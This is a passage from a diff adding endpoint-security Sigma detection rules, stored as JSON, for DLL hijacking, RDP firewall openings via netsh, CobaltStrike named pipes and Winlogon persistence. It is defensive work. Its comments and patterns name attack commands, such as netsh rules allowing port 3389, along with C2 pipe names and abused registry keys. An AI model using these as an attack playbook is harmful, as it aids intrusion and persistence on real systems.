Windows'\n ImageLoaded|endswith: '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2097d94f-4a7d-417e-8cb0-063a71e4cd4c", + "rule_name": "DLL Hijacking via ScriptRunner.exe", + "rule_description": "Detects potential Windows DLL Hijacking via ScriptRunner.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + 
"id": "20bddb6e-34a9-4ce0-821d-1a33c767e9a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.078839Z", + "creation_date": "2026-03-23T11:45:34.078841Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.078846Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.helpwire.app/blog/enable-remote-desktop-command-line/", + "https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/", + "https://thedfirreport.com/2021/05/12/conti-ransomware/", + "https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior#command-example-8-enable-specific-services", + "https://attack.mitre.org/techniques/T1562/004/", + "https://attack.mitre.org/techniques/T1021/001/" + ], + "name": "t1562_004_firewall_allow_rdp.yml", + "content": "title: Remote Desktop Traffic Enabled via netsh\nid: 20bddb6e-34a9-4ce0-821d-1a33c767e9a7\ndescription: |\n Detects a firewall filter modification that allows RDP traffic to pass through.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to 
accounts with known credentials.\n It is recommended to analyze the process responsible for the execution of netsh.exe, to look for other suspicious activities on the host and to investigate subsequent malicious RDP connections to the host.\nreferences:\n - https://www.helpwire.app/blog/enable-remote-desktop-command-line/\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior#command-example-8-enable-specific-services\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/12/01\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_netsh1:\n Image|endswith: '\\netsh.exe'\n # netsh firewall set service RemoteDesktop enable\n # netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\n CommandLine|contains|all:\n - 'firewall'\n - 'set'\n - 'remote'\n - 'desktop'\n - 'enable'\n selection_netsh2:\n Image|endswith: '\\netsh.exe'\n # netsh advfirewall firewall add rule name=\"rdp\" dir=in protocol=tcp localport=3389 action=allow\n CommandLine|contains|all:\n - 'firewall'\n - 'add rule'\n - 'rdp'\n - 'allow'\n - '3389'\n\n # Exclusion for firewall activation\n # netsh advfirewall firewall set rule group=\"remote desktop\" new enable=no\n filter_disable:\n CommandLine|contains|all:\n - 'set rule'\n - 'enable'\n - 'no'\n\n 
exclusion_open_nebula:\n Ancestors|contains:\n - '|?:\\Program Files\\OpenNebula\\rhsrvany.exe|'\n - '|?:\\Program Files (x86)\\OpenNebula\\rhsrvany.exe|'\n\n # https://learn.microsoft.com/fr-fr/windows-hardware/manufacture/desktop/add-a-custom-script-to-windows-setup?view=windows-11\n exclusion_setupcomplete:\n ParentCommandLine|endswith: '\\cmd.exe /c ?:\\Windows\\Setup\\Scripts\\SetupComplete.cmd'\n\n exclusion_siemens:\n ProcessGrandparentImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'TSplus SAS'\n\n exclusion_medulla:\n CommandLine|startswith: 'netsh advfirewall firewall add rule name=Remote Desktop for Medulla'\n\n exclusion_syngo:\n ParentCommandLine|contains:\n - '\\syngo_delta_pkg\\setup\\FeatureInstallServer.bat'\n - '\\Program Files\\Siemens\\syngo\\bin\\Common\\'\n\n exclusion_TSplus_AdminTool:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\AdminTool.exe'\n\n exclusion_svcr:\n ProcessGrandparentImage|endswith: '\\svcr.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature|contains: 'Remote Access World SAS'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "20bddb6e-34a9-4ce0-821d-1a33c767e9a7", + "rule_name": "Remote Desktop Traffic Enabled via netsh", + "rule_description": "Detects a firewall filter modification that allows RDP traffic to pass through.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nIt is recommended to analyze the process responsible for the execution of netsh.exe, to look for other suspicious activities on the host and to investigate subsequent malicious RDP connections to the host.\n", + "rule_creation_date": "2022-12-01", + 
"rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.001", + "attack.t1562.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "20bf9b2e-173e-4162-b9c8-d50e1b4b38ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.081735Z", + "creation_date": "2026-03-23T11:45:34.081737Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.081741Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_mdeserver.yml", + "content": "title: DLL Hijacking via mdeserver.exe\nid: 20bf9b2e-173e-4162-b9c8-d50e1b4b38ff\ndescription: |\n Detects potential Windows DLL Hijacking via mdeserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application 
and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdeserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\MFPlat.DLL'\n - '\\RTWorkQ.DLL'\n - '\\SspiCli.dll'\n - '\\winmde.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "20bf9b2e-173e-4162-b9c8-d50e1b4b38ff", + "rule_name": "DLL Hijacking via mdeserver.exe", + "rule_description": "Detects potential Windows DLL Hijacking via mdeserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning 
both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "20cfd136-f946-4130-a522-6597ff877ac3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.072975Z", + "creation_date": "2026-03-23T11:45:34.072977Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.072981Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/", + "https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py", + "https://attack.mitre.org/techniques/T1021/002/" + ], + "name": "t1021_002_custom_cobaltstrike_named_pipes_connected.yml", + "content": "title: Custom CobaltStrike Named Pipe Connected\nid: 20cfd136-f946-4130-a522-6597ff877ac3\ndescription: |\n Detects the connection to a Named Pipe pertaining to the CobaltStrike framework.\n These are custom CobaltStrike Named Pipe as seen in previous attacks.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\n - https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8\n - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\n - https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - 
classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName:\n - '\\mojo.5688.8052.183894939787088877*'\n - '\\mojo.5688.8052.35780273329370473*'\n - '\\scerpc_*'\n - '\\win_svc*'\n - '\\demoagent_11*'\n - '\\demoagent_22*'\n - '\\Winsock2\\CatalogChangeListener-*-0,'\n - '\\wkssvc_??'\n - '\\ntsvcs??'\n - '\\DserNamePipe??'\n - '\\PGMessagePipe??'\n - '\\SearchTextHarvester??'\n - '\\mypipe-f??'\n - '\\mypipe-h??'\n - '\\windows.update.manager??'\n - '\\windows.update.manager???'\n - '\\MsFteWds??'\n - '\\f4c3??'\n - '\\f53f??'\n - '\\fullduplex_??'\n - '\\msrpc_????'\n - '\\win\\msrpc_??'\n - '\\rpc_??'\n - '\\spoolss_??'\n # https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - '\\ProtectionManager_????_??'\n - '\\ProtectionManager_??'\n - '\\Winsock2\\\\CatalogChangeListener-???????-1'\n - '\\Winsock2\\\\CatalogChangeListener-??-??'\n - '\\Spool\\\\pipe_????_??'\n - '\\Spool\\\\pipe_??'\n - '\\WkSvcPipeMgr_??????'\n - '\\WkSvcPipeMgr_??'\n - '\\NetClient_??????'\n - '\\NetClient_??'\n - '\\RPC_??????'\n - '\\WiFiNetMgr????_??'\n - '\\WiFiNetMgr_??'\n - '\\AuthPipeD_??'\n\n exclusion_trendmicro:\n PipeName:\n - '\\f4c3??'\n - '\\f53f??'\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\\\*'\n - '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "20cfd136-f946-4130-a522-6597ff877ac3", + "rule_name": "Custom CobaltStrike Named Pipe Connected", + "rule_description": "Detects the connection to a Named Pipe pertaining to the CobaltStrike framework.\nThese are custom CobaltStrike Named Pipe as seen in previous attacks.\nCobaltStrike uses Named Pipes mainly to follow its deployment status 
and to self-replicate using SMB.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\n", + "rule_creation_date": "2022-07-08", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.002", + "attack.t1559" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "20feacae-9a99-4ce6-8f8c-c02176cb730a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.620673Z", + "creation_date": "2026-03-23T11:45:34.620675Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.620680Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://www.ired.team/offensive-security/persistence/windows-logon-helper", + "https://persistence-info.github.io/Data/mpnotify.html", + "https://twitter.com/0gtweet/status/1548604288611614725", + "https://attack.mitre.org/techniques/T1547/004/" + ], + "name": "t1547_004_persistence_winlogon_helper.yml", + "content": "title: Winlogon Helper 
DLL Installed\nid: 20feacae-9a99-4ce6-8f8c-c02176cb730a\ndescription: |\n Detects a change of the Winlogon configuration via registry modification.\n Attackers may abuse features of Winlogon to execute DLLs and/or executables at user logon.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://www.ired.team/offensive-security/persistence/windows-logon-helper\n - https://persistence-info.github.io/Data/mpnotify.html\n - https://twitter.com/0gtweet/status/1548604288611614725\n - https://attack.mitre.org/techniques/T1547/004/\ndate: 2020/09/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.004\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_winlogon:\n EventType: SetValue\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n\n selection_notify:\n EventType: SetValue\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\\\*\\DllName'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\\\*\\DllName'\n\n # Detects suspicious persistence by creating the mpnotify value.\n # The executable will be loaded by the winlogon.exe process at user logon.\n # The new process will be terminated after a timeout of 30 seconds.\n selection_mpnotify:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Winlogon\\mpnotify'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_userinit:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details:\n # cannot use *\\userinit.exe because one could add its persistence before the userinit entry and we would miss it\n - '?:\\windows\\system32\\userinit.exe,'\n - '?:\\windows\\system32\\userinit.exe'\n - '?:\\windows\\syswow64\\userinit.exe,'\n - '?:\\windows\\syswow64\\userinit.exe'\n - 'userinit.exe'\n - 'userinit.exe,'\n - '?:\\windows\\system32\\kusrinit.exe,' # DELL/Kace agent\n - '?:\\WINDOWS\\system32\\userinit.exe,?:\\windows\\system32\\KUsrInit.exe,'\n - '?:\\Windows\\system32\\Cliaca2kp.exe,?:\\Windows\\System32\\KUsrInit.exe' # IACA, DELL/Kace agent\n - '?:\\windows\\system32\\userinit.exe,\"?:\\program files\\vmware\\vmware view\\agent\\bin\\wssm.exe\",' # VMWare view agent\n - '?:\\windows\\system32\\userinit.exe,\"?:\\program files\\unidesk\\layering services\\layerinfo.exe\",' # CITRIX app layering\n - '?:\\Windows\\system32\\userinit.exe,?:\\Program Files (x86)\\HP\\HP ProtectTools 
Security Manager\\Bin\\DPAgent.exe,' # HP ProtectTools agent\n - '?:\\Windows\\system32\\userinit.exe,?:\\Program Files (x86)\\Hewlett-Packard\\HP ProtectTools Security Manager\\Bin\\DPAgent.exe,'\n - '?:\\WINDOWS\\system32\\userinit.exe,\"?:\\Program Files (x86)\\Avencis\\SSOX\\SessionManager+.exe\"' # Avencis\n\n exclusion_shell_explorer:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'explorer.exe'\n\n exclusion_sccertprop:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ScCertProp\\DllName'\n Details|contains: 'wlnotify.dll'\n\n exclusion_logmein_gotoassist:\n TargetObject:\n - '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GoToAssist Express Customer\\DLLName'\n - '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GoToAssist\\DLLName'\n Details|endswith:\n - 'g2ax_winlogonx64.dll'\n - 'g2awinlogon_x64.dll'\n # FIXME: waiting for agent in production to support those fields\n # ProcessSignature: 'LogMeIn, Inc.'\n # ProcessSigned: 'true'\n\n exclusion_citrix:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\MetaFrame\\DLLName'\n Details: 'ctxnotif.dll'\n exclusion_citrix_icaservice:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\cpwswlx\\DLLName'\n Details:\n - '?:\\program files\\citrix\\icaservice\\cpwswlx64.dll'\n - '?:\\Program Files\\Citrix\\HDX\\bin\\CpWsWlx64.dll'\n exclusion_citrix_selfservice:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\shell'\n Details: '?:\\Program Files (x86)\\Citrix\\ICA Client\\SelfServicePlugin\\selfservice.exe'\n\n exclusion_userlock_agent:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details: 
'?:\\WINDOWS\\SYSWOW64\\ULAGENTEXE.EXE,'\n\n exclusion_zonecentral:\n Image: '?:\\Program Files\\Prim?x\\ZoneCentral\\zcs.exe'\n Details: '*zcuserinit.exe*'\n\n exclusion_igfxcui:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\igfxcui\\DLLName'\n Details: 'igfxdev.dll'\n\n exclusion_logishrd:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\LBTWlgn\\DLLName'\n Details|contains: '?:\\program files\\common files\\logishrd\\bluetooth\\LBTWlgn.dll'\n\n exclusion_ccnotify:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ccnotify\\DLLName'\n Details: 'ccnotify.dll'\n\n exclusion_novell:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\LCredMgr\\DLLName'\n Details: '?:\\Program Files\\Novell\\CASA\\bin\\lcredmgr.dll'\n\n exclusion_zencredmanager:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ZenCredManager\\DLLName'\n Details: 'ZenCredManager.dll'\n\n # https://tsplus.net/fr/\n exclusion_tsplus:\n ProcessCommandLine:\n - '?:\\wsession\\svcr.exe logonsession.bin ?:\\wsession\\logonsession.exe'\n - '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\APSC.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: '?:\\ProgramData\\alternateshell.exe'\n\n exclusion_displaynote_technologies:\n ProcessImage: '?:\\Program Files (x86)\\DisplayNoteTechnologies\\Launcher\\KioskStarter.exe'\n Details: '?:\\Program Files (x86)\\DisplayNoteTechnologies\\Launcher\\KioskStarter.exe'\n\n # Windows in kiosk mode\n exclusion_customshellhost:\n ProcessCommandLine|contains: '?:\\windows\\system32\\svchost.exe -k AssignedAccessManagerSvc'\n Details: 'customshellhost.exe'\n\n exclusion_kiosk:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'conhost.exe --headless pwsh -WindowStyle 
hidden -File \"?:\\Windows\\System32\\Kiosk.ps1\"'\n\n exclusion_isl_online:\n ProcessImage:\n - '?:\\Program Files (x86)\\ISL Online Cache\\ISL Restart\\s_?\\ISLLightService.exe'\n - '?:\\Program Files (x86)\\ISL Online\\ISL Restart\\s_?\\ISLLightService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\ISL Online Cache\\ISL Restart\\s_?\\ISLLightService.exe'\n Details:\n - '?:\\Program Files (x86)\\ISL Online Cache\\ISL Restart\\s_?\\isl_notify64.dll'\n - '?:\\Program Files (x86)\\ISL Online\\ISL Restart\\s_?\\isl_notify64.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\ISL Online Cache\\ISL Restart\\s_?\\isl_notify64.dll'\n\n exclusion_archimed:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: '?:\\Program Files\\Archimed\\shell\\unishell.exe'\n\n exclusion_crews:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'CrewsDesk.exe'\n ProcessImage: '*\\Resa Crews Cupps\\CrewsCupps.exe'\n\n exclusion_omniware:\n ProcessImage|endswith: '\\APSC.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'JWTS SASU'\n - 'Remote Access World SAS'\n Details|startswith: '?:\\ProgramData\\alternateshell.exe'\n\n exclusion_ivanti:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details|contains:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrstart.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n\n exclusion_windowssetup:\n Image:\n - '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n - 